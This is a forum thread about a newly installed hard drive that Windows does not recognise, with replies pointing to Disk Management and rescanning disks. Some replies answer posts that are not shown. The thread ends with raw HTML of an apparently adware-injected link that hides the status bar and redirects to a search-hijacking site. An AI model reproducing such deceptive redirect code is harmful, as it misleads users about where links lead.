im a noob at this kind of stuff, and this is my first time ever touching the innerds of a computer. but i've seen it done before, so i know (basically) what to do.
i connected a harddrive just now, and i went into settings before windows booted, and went into the blah blah you know, and tried to make the computer recognise the new harddrive, and it didn't. i tried this more than three times, and it still wouldn't recognise it. so umm.. what do i do now??
ps excuse my n00blyness :/ i just really want this harddrive hooked up.
my computer wont recognise!

When I installed my new Hard Drive, I made sure it was correctly inserted, and the jumpers were all spiffy, then I went to Control Panel -> Administrative Tools -> Computer Managment -> Storage -> Disk Managment
I think it should automatically come up with something asking about whether you want to set it up etc. But if not, click the Action Tab -> Rescan disks. I think that might work, but if not, post again to tell us what happened

Strange, Perhaps someone with more experience in this area can help you

Get both. Scan with both. Be happy.

WT? Perhaps you've got spyware which inserts that text in posts etc. It's not unknown , and I know a person with ad-ware which kept automatically saying things in MSN messenger...<a onMouseOver="window.status='' ; return true;" onMouseOut="window.status='';" oncontextmenu="window.status=''; return true;" onclick="location.href='http://www.enhancemysearch.com/admin/re ... =4';return false;" href="" TITLE="More Info...">
